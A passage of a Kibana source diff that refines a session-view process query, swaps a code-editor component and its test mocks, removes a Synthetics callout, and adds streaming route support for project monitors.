body: { total: 0, events: [] } }); + } + + return response.badRequest(err.message); + } + } + ); +}; diff --git a/x-pack/plugins/session_view/server/routes/process_events_route.ts b/x-pack/plugins/session_view/server/routes/process_events_route.ts index 2bb1aa4579ec9..614c7ad135e73 100644 --- a/x-pack/plugins/session_view/server/routes/process_events_route.ts +++ b/x-pack/plugins/session_view/server/routes/process_events_route.ts @@ -12,6 +12,7 @@ import type { AlertsClient, RuleRegistryPluginStartContract, } from '@kbn/rule-registry-plugin/server'; +import { EVENT_ACTION } from '@kbn/rule-data-utils'; import { ALERTS_PER_PROCESS_EVENTS_PAGE, PROCESS_EVENTS_ROUTE, @@ -77,8 +78,13 @@ export const fetchEventsAndScopedAlerts = async ( index: [PROCESS_EVENTS_INDEX], body: { query: { - match: { - [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId, + bool: { + must: [{ term: { [ENTRY_SESSION_ENTITY_ID_PROPERTY]: sessionEntityId } }], + should: [ + { term: { [EVENT_ACTION]: 'fork' } }, + { term: { [EVENT_ACTION]: 'exec' } }, + { term: { [EVENT_ACTION]: 'end' } }, + ], }, }, size: PROCESS_EVENTS_PER_PAGE, diff --git a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx index e361c4d98bb77..e70a2988a324e 100644 --- a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx +++ b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.test.tsx @@ -23,18 +23,11 @@ import { useKibana } from '@kbn/kibana-react-plugin/public'; import { EsQueryAlertParams, SearchType } from '../types'; import { EsQueryExpression } from './es_query_expression'; -jest.mock('@kbn/kibana-react-plugin/public'); -jest.mock('@kbn/es-ui-shared-plugin/public', () => ({ - XJson: { - useXJsonMode: jest.fn().mockReturnValue({ - convertToJson: jest.fn(), - setXJson: jest.fn(), - xJson: jest.fn(), - }), - }, - // Mocking EuiCodeEditor, which uses React Ace under the hood +jest.mock('@kbn/kibana-react-plugin/public', () => ({ + useKibana: jest.fn(), + // Mocking CodeEditor // eslint-disable-next-line @typescript-eslint/no-explicit-any - EuiCodeEditor: (props: any) => ( + CodeEditor: (props: any) => ( ({ /> ), })); +jest.mock('@kbn/es-ui-shared-plugin/public', () => ({ + XJson: { + useXJsonMode: jest.fn().mockReturnValue({ + convertToJson: jest.fn(), + setXJson: jest.fn(), + xJson: jest.fn(), + }), + }, +})); jest.mock('@kbn/triggers-actions-ui-plugin/public', () => { const original = jest.requireActual('@kbn/triggers-actions-ui-plugin/public'); return { diff --git a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx index 6432ba9a324a8..380da4bea6d3a 100644 --- a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx +++ b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/es_query_expression.tsx @@ -10,14 +10,11 @@ import { lastValueFrom } from 'rxjs'; import { i18n } from '@kbn/i18n'; import { FormattedMessage } from '@kbn/i18n-react'; -import { XJsonMode } from '@kbn/ace'; -import 'brace/theme/github'; - import { EuiFormRow, EuiLink, EuiSpacer, EuiTitle } from '@elastic/eui'; import { DocLinksStart, HttpSetup } from '@kbn/core/public'; -import { EuiCodeEditor, XJson } from '@kbn/es-ui-shared-plugin/public'; -import { useKibana } from '@kbn/kibana-react-plugin/public'; +import { XJson } from '@kbn/es-ui-shared-plugin/public'; +import { CodeEditor, useKibana } from '@kbn/kibana-react-plugin/public'; import { getFields, RuleTypeParamsExpressionProps } from '@kbn/triggers-actions-ui-plugin/public'; import { parseDuration } from '@kbn/alerting-plugin/common'; import { hasExpressionValidationErrors } from '../validation'; @@ -29,7 +26,6 @@ import { RuleCommonExpressions } from '../rule_common_expressions'; import { totalHitsToNumber } from '../test_query_row'; const { useXJsonMode } = XJson; -const xJsonMode = new XJsonMode(); interface KibanaDeps { http: HttpSetup; @@ -206,20 +202,28 @@ export const EsQueryExpression: React.FC< } > - { setXJson(xjson); setParam('esQuery', convertToJson(xjson)); }} + options={{ + ariaLabel: i18n.translate('xpack.stackAlerts.esQuery.ui.queryEditor', { + defaultMessage: 'Elasticsearch query editor', + }), + wordWrap: 'off', + tabSize: 2, + lineNumbers: 'off', + lineNumbersMinChars: 0, + folding: false, + lineDecorationsWidth: 0, + overviewRulerBorder: false, + }} /> diff --git a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx index e26bfb48ff8b5..94b396bc8ea3c 100644 --- a/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx +++ b/x-pack/plugins/stack_alerts/public/alert_types/es_query/expression/expression.test.tsx @@ -24,6 +24,24 @@ import { KibanaContextProvider } from '@kbn/kibana-react-plugin/public'; import { act } from 'react-dom/test-utils'; import { ReactWrapper } from 'enzyme'; +jest.mock('@kbn/kibana-react-plugin/public', () => { + const original = jest.requireActual('@kbn/kibana-react-plugin/public'); + return { + ...original, + // Mocking CodeEditor + // eslint-disable-next-line @typescript-eslint/no-explicit-any + CodeEditor: (props: any) => ( + { + props.onChange(syntheticEvent.jsonString); + }} + /> + ), + }; +}); + const defaultEsQueryRuleParams: EsQueryAlertParams = { size: 100, thresholdComparator: '>', @@ -188,7 +206,7 @@ describe('EsQueryAlertTypeExpression', () => { wrapper = await wrapper.update(); expect(findTestSubject(wrapper, 'queryFormTypeChooserTitle').exists()).toBeFalsy(); - expect(findTestSubject(wrapper, 'queryJsonEditor').exists()).toBeTruthy(); + expect(wrapper.exists('[data-test-subj="queryJsonEditor"]')).toBeTruthy(); expect(findTestSubject(wrapper, 'selectIndexExpression').exists()).toBeTruthy(); await act(async () => { diff --git a/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts b/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts index 098ad0530af8d..85b5adc8a2020 100644 --- a/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts +++ b/x-pack/plugins/stack_alerts/server/alert_types/geo_containment/tests/geo_containment.test.ts @@ -40,6 +40,7 @@ const alertFactory = (contextKeys: unknown[], testAlertActionArr: unknown[]) => ); return alertInstance; }, + hasReachedAlertLimit: () => false, done: () => ({ getRecoveredAlerts: () => [] }), }); diff --git a/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts b/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts index f2504e690965f..ce19d8442d056 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts +++ b/x-pack/plugins/synthetics/e2e/journeys/alerts/default_email_settings.ts @@ -43,7 +43,6 @@ journey('DefaultEmailSettings', async ({ page, params }) => { }); step('clear existing settings', async () => { - await settings.dismissSyntheticsCallout(); await page.waitForSelector(byTestId('"default-connectors-input-loaded"')); await page.waitForTimeout(10 * 1000); const toEmailInput = await page.$(byTestId('toEmailAddressInput')); diff --git a/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts b/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts index 1193409d0df94..ba62da5d4a4d7 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts +++ b/x-pack/plugins/synthetics/e2e/journeys/step_duration.journey.ts @@ -30,7 +30,6 @@ journey('StepsDuration', async ({ page, params }) => { }); step('Go to monitor details', async () => { - await page.click('text=Dismiss'); await page.click('button:has-text("test-monitor - inline")'); expect(page.url()).toBe(`${baseUrl}/monitor/dGVzdC1tb25pdG9yLWlubGluZQ==/?${queryParams}`); }); diff --git a/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts b/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts index 40035e9c70923..2d9f1f888a936 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts +++ b/x-pack/plugins/synthetics/e2e/journeys/synthetics/getting_started.journey.ts @@ -46,8 +46,4 @@ journey(`Getting Started Page`, async ({ page, params }: { page: Page; params: a await createBasicMonitor(); await syntheticsApp.confirmAndSave(); }); - - step('it navigates to details page after saving', async () => { - await page.click('text=Dismiss'); - }); }); diff --git a/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts b/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts index 5896b609cf76d..15cca32983e1d 100644 --- a/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts +++ b/x-pack/plugins/synthetics/e2e/journeys/uptime.journey.ts @@ -28,12 +28,6 @@ journey('uptime', ({ page, params }) => { await page.click('[data-test-subj=loginSubmit]'); }); - step('dismiss synthetics notice', async () => { - await page.click('[data-test-subj=uptimeDismissSyntheticsCallout]', { - timeout: 60 * 1000, - }); - }); - step('change uptime index pattern', async () => { await page.click(byTestId('settings-page-link')); diff --git a/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx b/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx index 024609e2f69ef..74fa8f6c8ce54 100644 --- a/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx +++ b/x-pack/plugins/synthetics/e2e/page_objects/utils.tsx @@ -19,12 +19,6 @@ export function utilsPageProvider({ page }: { page: Page }) { } }, - async dismissSyntheticsCallout() { - await page.click('[data-test-subj=uptimeDismissSyntheticsCallout]', { - timeout: 60 * 1000, - }); - }, - async assertText({ text }: { text: string }) { await page.waitForSelector(`text=${text}`); expect(await page.$(`text=${text}`)).toBeTruthy(); diff --git a/x-pack/plugins/synthetics/kibana.json b/x-pack/plugins/synthetics/kibana.json index 9597d05a44229..f6d30abeb4000 100644 --- a/x-pack/plugins/synthetics/kibana.json +++ b/x-pack/plugins/synthetics/kibana.json @@ -21,7 +21,8 @@ "triggersActionsUi", "usageCollection", "unifiedSearch", - "spaces" + "spaces", + "bfetch" ], "server": true, "ui": true, diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts b/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts index af51f39786898..64d72aa248d78 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts +++ b/x-pack/plugins/synthetics/public/legacy_uptime/app/use_no_data_config.ts @@ -9,12 +9,12 @@ import { i18n } from '@kbn/i18n'; import { useContext } from 'react'; import { useSelector } from 'react-redux'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; import { UptimeSettingsContext } from '../contexts'; import { ClientPluginsStart } from '../../plugin'; import { indexStatusSelector } from '../state/selectors'; -export function useNoDataConfig(): KibanaPageTemplateProps['noDataConfig'] { +export function useNoDataConfig(): NoDataConfig | undefined { const { basePath } = useContext(UptimeSettingsContext); const { diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx index e4e55b96f09dc..f9a02507f5ec3 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.test.tsx @@ -251,9 +251,7 @@ describe('', () => { expect(node).toBeInTheDocument(); }); expect( - getByText( - /To create a "Browser" monitor, please ensure you are using the elastic-agent-complete Docker container, which contains the dependencies to run these mon/ - ) + getByText(/To create a "Browser" monitor, please ensure you are using the/) ).toBeInTheDocument(); // expect tls options to be available for browser diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx index 1d6c2a085ec68..e600c8067cc9a 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/fleet_package/custom_fields.tsx @@ -16,6 +16,7 @@ import { EuiSpacer, EuiSwitch, EuiCallOut, + EuiCode, EuiLink, } from '@elastic/eui'; import { DescribedFormGroupWithWrap } from './common/described_form_group_with_wrap'; @@ -154,27 +155,32 @@ export const CustomFields = memo( - - - ), - }} + id="xpack.synthetics.createPackagePolicy.stepConfigure.monitorIntegrationSettingsSection.monitorType.browser.warning.title" + defaultMessage="Requirement" /> } - iconType="help" size="s" - /> + > + elastic-agent-complete, + link: ( + + + + ), + }} + /> + )} {renderSimpleFields(monitorType)} diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx index f49bbf10a9afc..d1d9eb03c01f6 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/add_location_flyout.tsx @@ -15,7 +15,6 @@ import { EuiFlyoutBody, EuiFlyoutFooter, EuiFlyoutHeader, - EuiSpacer, EuiTitle, EuiFlyout, EuiButton, @@ -77,8 +76,6 @@ export const AddLocationFlyout = ({

{NEED_FLEET_READ_AGENT_POLICIES_PERMISSION}

)} - - diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx index 67e6a29ea936f..d30dcb2d7db42 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/empty_locations.tsx @@ -26,10 +26,11 @@ export const EmptyLocations = ({ {ADD_FIRST_LOCATION}} + titleSize="s" body={ -

+ {!inFlyout ? FIRST_MONITOR : ''} {START_ADDING_LOCATIONS_DESCRIPTION} -

+ } actions={ {LEARN_MORE}{' '} - + {READ_DOCS} diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx index 8985a5e0a09ee..a15629a99e3d9 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/location_form.tsx @@ -5,7 +5,16 @@ * 2.0. */ import React from 'react'; -import { EuiFieldText, EuiForm, EuiFormRow, EuiSpacer } from '@elastic/eui'; +import { FormattedMessage } from '@kbn/i18n-react'; +import { + EuiFieldText, + EuiForm, + EuiFormRow, + EuiSpacer, + EuiCallOut, + EuiCode, + EuiLink, +} from '@elastic/eui'; import { useSelector } from 'react-redux'; import { i18n } from '@kbn/i18n'; import { useFormContext, useFormState } from 'react-hook-form'; @@ -52,11 +61,44 @@ export const LocationForm = ({ + + +

+ { + elastic-agent-complete, + link: ( + + + + ), + }} + /> + } +

+ ); }; +export const AGENT_CALLOUT_TITLE = i18n.translate( + 'xpack.synthetics.monitorManagement.agentCallout.title', + { + defaultMessage: 'Requirement', + } +); + export const LOCATION_NAME_LABEL = i18n.translate( 'xpack.synthetics.monitorManagement.locationName', { diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx index fc8f7d9b1c2f0..103a9a37480db 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/manage_locations_flyout.tsx @@ -78,7 +78,7 @@ export const ManageLocationsFlyout = () => { const flyout = ( - +

{PRIVATE_LOCATIONS}

 diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx index 7188a896ef4b5..7a1d59e611e6b 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/monitor_management/manage_locations/policy_hosts.tsx @@ -91,7 +91,7 @@ export const PolicyHostsField = ({ @@ -126,6 +126,13 @@ const SELECT_POLICY_HOSTS = i18n.translate('xpack.synthetics.monitorManagement.s defaultMessage: 'Select agent policy', }); +const SELECT_POLICY_HOSTS_HELP_TEXT = i18n.translate( + 'xpack.synthetics.monitorManagement.selectPolicyHost.helpText', + { + defaultMessage: 'We recommend using a single Elastic agent per agent policy.', + } +); + const POLICY_HOST_LABEL = i18n.translate('xpack.synthetics.monitorManagement.policyHost', { defaultMessage: 'Agent policy', }); diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx index 2236b122459ca..425d881e0141e 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/monitor_list/columns/test_now_col.tsx @@ -82,7 +82,7 @@ export const TEST_NOW_AVAILABLE_LABEL = i18n.translate( export const PRIVATE_AVAILABLE_LABEL = i18n.translate( 'xpack.synthetics.monitorList.testNow.available.private', { - defaultMessage: 'For now, Test now is disabled for private locations monitors.', + defaultMessage: `You can't currently test monitors running on private locations on demand.`, } ); diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.test.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.test.tsx deleted file mode 100644 index d5b82a562be3b..0000000000000 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.test.tsx +++ /dev/null @@ -1,133 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { shallowWithIntl } from '@kbn/test-jest-helpers'; -import React from 'react'; -import { SyntheticsCallout } from './synthetics_callout'; - -describe('SyntheticsCallout', () => { - let setItemMock; - let localStorageMock: any; - - beforeEach(() => { - setItemMock = jest.fn(); - localStorageMock = { - getItem: jest.fn().mockImplementation(() => null), - setItem: setItemMock, - }; - - global.localStorage = localStorageMock; - }); - - it('renders component if dismissal flag is unset', () => { - expect(shallowWithIntl()).toMatchInlineSnapshot(` - - -

- -

- - - - - - - - - - - - - - - `); - }); - - it('returns null if callout has been dismissed', () => { - localStorageMock.getItem = jest.fn().mockImplementation(() => 'true'); - expect(shallowWithIntl()).toEqual({}); - }); - - it('renders the component, and then returns null when dismiss button clicked', () => { - localStorageMock.getItem = jest - .fn() - .mockImplementationOnce(() => null) - .mockImplementationOnce(() => 'true'); - const wrapper = shallowWithIntl(); - expect(wrapper).toMatchInlineSnapshot(` - - -

- -

- - - - - - - - - - - - - - - `); - wrapper.find('EuiButton').simulate('click'); - expect(wrapper).toEqual({}); - }); -}); diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.tsx deleted file mode 100644 index a6c4f06d31c27..0000000000000 --- a/x-pack/plugins/synthetics/public/legacy_uptime/components/overview/synthetics_callout.tsx +++ /dev/null @@ -1,72 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { EuiButton, EuiButtonEmpty, EuiCallOut, EuiFlexGroup, EuiFlexItem } from '@elastic/eui'; -import React, { useState } from 'react'; -import { i18n } from '@kbn/i18n'; -import { FormattedMessage } from '@kbn/i18n-react'; - -const SYNTHETICS_CALLOUT_LS_KEY = 'xpack.uptime.syntheticsCallout.display'; -const shouldShowSyntheticsCallout = () => { - let value = localStorage.getItem(SYNTHETICS_CALLOUT_LS_KEY); - if (value === null) { - localStorage.setItem(SYNTHETICS_CALLOUT_LS_KEY, 'true'); - value = 'true'; - } - return value === 'true'; -}; -const hideSyntheticsCallout = () => localStorage.setItem(SYNTHETICS_CALLOUT_LS_KEY, 'false'); - -export const SyntheticsCallout = () => { - const [shouldShow, setShouldShow] = useState(shouldShowSyntheticsCallout()); - if (!shouldShow) { - return null; - } - return ( - <> - -

- -

- - - - - - - - { - if (shouldShow) { - hideSyntheticsCallout(); - setShouldShow(false); - } - }} - > - - - - - - - ); -}; diff --git a/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx b/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx index b32144750705b..6fd6ee19534b5 100644 --- a/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx +++ b/x-pack/plugins/synthetics/public/legacy_uptime/routes.tsx @@ -49,7 +49,6 @@ import { MonitorPageTitle, MonitorPageTitleContent } from './components/monitor/ import { UptimeDatePicker } from './components/common/uptime_date_picker'; import { CertRefreshBtn } from './components/certificates/cert_refresh_btn'; import { CertificateTitle } from './components/certificates/certificate_title'; -import { SyntheticsCallout } from './components/overview/synthetics_callout'; import { StepDetailPageChildren, StepDetailPageHeader, @@ -314,7 +313,6 @@ export const PageRouter: FC = () => { }) => (
- , + Record, + Record +>; + /** * Defines the basic properties employed by Uptime routes. */ export interface UMServerRoute { - method: string; + method: 'GET' | 'PUT' | 'POST' | 'DELETE'; writeAccess?: boolean; handler: T; + streamHandler?: ( + context: UptimeRequestHandlerContext, + request: SyntheticsRequest, + subject: Subject + ) => IKibanaResponse | Promise>; } /** @@ -56,6 +68,7 @@ export type UptimeRoute = UMRouteDefinition; */ export type UMRestApiRouteFactory = (libs: UMServerLibs) => UptimeRoute; export type SyntheticsRestApiRouteFactory = (libs: UMServerLibs) => SyntheticsRoute; +export type SyntheticsStreamingRouteFactory = (libs: UMServerLibs) => SyntheticsStreamingRoute; /** * Functions of this type accept our internal route format and output a route @@ -67,9 +80,10 @@ export type UMKibanaRouteWrapper = ( ) => UMKibanaRoute; export type SyntheticsRoute = UMRouteDefinition; +export type SyntheticsStreamingRoute = UMRouteDefinition; export type SyntheticsRouteWrapper = ( - uptimeRoute: SyntheticsRoute, + uptimeRoute: SyntheticsRoute | SyntheticsStreamingRoute, server: UptimeServerSetup, syntheticsMonitorClient: SyntheticsMonitorClient ) => UMKibanaRoute; @@ -84,13 +98,15 @@ export type UMRouteHandler = ({ response, server, savedObjectsClient, + subject, }: { uptimeEsClient: UptimeESClient; context: UptimeRequestHandlerContext; - request: KibanaRequest, Record, Record>; + request: SyntheticsRequest; response: KibanaResponseFactory; savedObjectsClient: SavedObjectsClientContract; server: UptimeServerSetup; + subject?: Subject; }) => IKibanaResponse | Promise>; export type SyntheticsRouteHandler = ({ @@ -100,12 +116,31 @@ export type SyntheticsRouteHandler = ({ response, server, savedObjectsClient, + subject: Subject, }: { uptimeEsClient: UptimeESClient; context: UptimeRequestHandlerContext; - request: KibanaRequest, Record, Record>; + request: SyntheticsRequest; response: KibanaResponseFactory; savedObjectsClient: SavedObjectsClientContract; server: UptimeServerSetup; syntheticsMonitorClient: SyntheticsMonitorClient; + subject?: Subject; +}) => IKibanaResponse | Promise>; + +export type SyntheticsStreamingRouteHandler = ({ + uptimeEsClient, + context, + request, + server, + savedObjectsClient, + subject: Subject, +}: { + uptimeEsClient: UptimeESClient; + context: UptimeRequestHandlerContext; + request: SyntheticsRequest; + savedObjectsClient: SavedObjectsClientContract; + server: UptimeServerSetup; + syntheticsMonitorClient: SyntheticsMonitorClient; + subject?: Subject; }) => IKibanaResponse | Promise>; diff --git a/x-pack/plugins/synthetics/server/plugin.ts b/x-pack/plugins/synthetics/server/plugin.ts index fe323e65cb6dd..209ff9e57face 100644 --- a/x-pack/plugins/synthetics/server/plugin.ts +++ b/x-pack/plugins/synthetics/server/plugin.ts @@ -101,7 +101,7 @@ export class Plugin implements PluginType { initUptimeServer(this.server, plugins, ruleDataClient, this.logger); - initSyntheticsServer(this.server, this.syntheticsMonitorClient); + initSyntheticsServer(this.server, this.syntheticsMonitorClient, plugins); registerUptimeSavedObjects(core.savedObjects, plugins.encryptedSavedObjects); diff --git a/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts b/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts index 9af41b0d87d71..ae218e60e216a 100644 --- a/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts +++ b/x-pack/plugins/synthetics/server/routes/create_route_with_auth.ts @@ -8,13 +8,14 @@ import { UMServerLibs } from '../legacy_uptime/lib/lib'; import { SyntheticsRestApiRouteFactory, + SyntheticsStreamingRouteFactory, SyntheticsRoute, SyntheticsRouteHandler, } from '../legacy_uptime/routes'; export const createSyntheticsRouteWithAuth = ( libs: UMServerLibs, - routeCreator: SyntheticsRestApiRouteFactory + routeCreator: SyntheticsRestApiRouteFactory | SyntheticsStreamingRouteFactory ): SyntheticsRoute => { const restRoute = routeCreator(libs); const { handler, method, path, options, ...rest } = restRoute; diff --git a/x-pack/plugins/synthetics/server/routes/index.ts b/x-pack/plugins/synthetics/server/routes/index.ts index 2b6ca12e56b18..4190943a1acf2 100644 --- a/x-pack/plugins/synthetics/server/routes/index.ts +++ b/x-pack/plugins/synthetics/server/routes/index.ts @@ -26,10 +26,12 @@ import { installIndexTemplatesRoute } from './synthetics_service/install_index_t import { editSyntheticsMonitorRoute } from './monitor_cruds/edit_monitor'; import { addSyntheticsMonitorRoute } from './monitor_cruds/add_monitor'; import { addSyntheticsProjectMonitorRoute } from './monitor_cruds/add_monitor_project'; -import { SyntheticsRestApiRouteFactory } from '../legacy_uptime/routes'; +import { + SyntheticsRestApiRouteFactory, + SyntheticsStreamingRouteFactory, +} from '../legacy_uptime/routes'; export const syntheticsAppRestApiRoutes: SyntheticsRestApiRouteFactory[] = [ - addSyntheticsProjectMonitorRoute, addSyntheticsMonitorRoute, getSyntheticsEnablementRoute, deleteSyntheticsMonitorRoute, @@ -47,3 +49,7 @@ export const syntheticsAppRestApiRoutes: SyntheticsRestApiRouteFactory[] = [ getAPIKeySyntheticsRoute, createGetMonitorStatusRoute, ]; + +export const syntheticsAppStreamingApiRoutes: SyntheticsStreamingRouteFactory[] = [ + addSyntheticsProjectMonitorRoute, +]; diff --git a/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts b/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts index 87f0791156869..0cb817599b165 100644 --- a/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts +++ b/x-pack/plugins/synthetics/server/routes/monitor_cruds/add_monitor_project.ts @@ -8,12 +8,12 @@ import { schema } from '@kbn/config-schema'; import { UMServerLibs } from '../../legacy_uptime/lib/lib'; import { ProjectBrowserMonitor } from '../../../common/runtime_types'; -import { SyntheticsRestApiRouteFactory } from '../../legacy_uptime/routes/types'; +import { SyntheticsStreamingRouteFactory } from '../../legacy_uptime/routes/types'; import { API_URLS } from '../../../common/constants'; import { getAllLocations } from '../../synthetics_service/get_all_locations'; import { ProjectMonitorFormatter } from '../../synthetics_service/project_monitor_formatter'; -export const addSyntheticsProjectMonitorRoute: SyntheticsRestApiRouteFactory = ( +export const addSyntheticsProjectMonitorRoute: SyntheticsStreamingRouteFactory = ( libs: UMServerLibs ) => ({ method: 'PUT', @@ -27,46 +27,51 @@ export const addSyntheticsProjectMonitorRoute: SyntheticsRestApiRouteFactory = ( }, handler: async ({ request, - response, savedObjectsClient, server, syntheticsMonitorClient, + subject, }): Promise => { - const monitors = (request.body?.monitors as ProjectBrowserMonitor[]) || []; - const spaceId = server.spaces.spacesService.getSpaceId(request); - const { keep_stale: keepStale, project: projectId } = request.body || {}; - const { publicLocations, privateLocations } = await getAllLocations( - server, - syntheticsMonitorClient, - savedObjectsClient - ); - const encryptedSavedObjectsClient = server.encryptedSavedObjects.getClient(); + try { + const monitors = (request.body?.monitors as ProjectBrowserMonitor[]) || []; + const spaceId = server.spaces.spacesService.getSpaceId(request); + const { keep_stale: keepStale, project: projectId } = request.body || {}; + const { publicLocations, privateLocations } = await getAllLocations( + server, + syntheticsMonitorClient, + savedObjectsClient + ); + const encryptedSavedObjectsClient = server.encryptedSavedObjects.getClient(); - const pushMonitorFormatter = new ProjectMonitorFormatter({ - projectId, - spaceId, - keepStale, - locations: publicLocations, - privateLocations, - encryptedSavedObjectsClient, - savedObjectsClient, - monitors, - server, - syntheticsMonitorClient, - request, - }); + const pushMonitorFormatter = new ProjectMonitorFormatter({ + projectId, + spaceId, + keepStale, + locations: publicLocations, + privateLocations, + encryptedSavedObjectsClient, + savedObjectsClient, + monitors, + server, + syntheticsMonitorClient, + request, + subject, + }); - await pushMonitorFormatter.configureAllProjectMonitors(); + await pushMonitorFormatter.configureAllProjectMonitors(); - return response.ok({ - body: { + subject?.next({ createdMonitors: pushMonitorFormatter.createdMonitors, updatedMonitors: pushMonitorFormatter.updatedMonitors, staleMonitors: pushMonitorFormatter.staleMonitors, deletedMonitors: pushMonitorFormatter.deletedMonitors, failedMonitors: pushMonitorFormatter.failedMonitors, failedStaleMonitors: 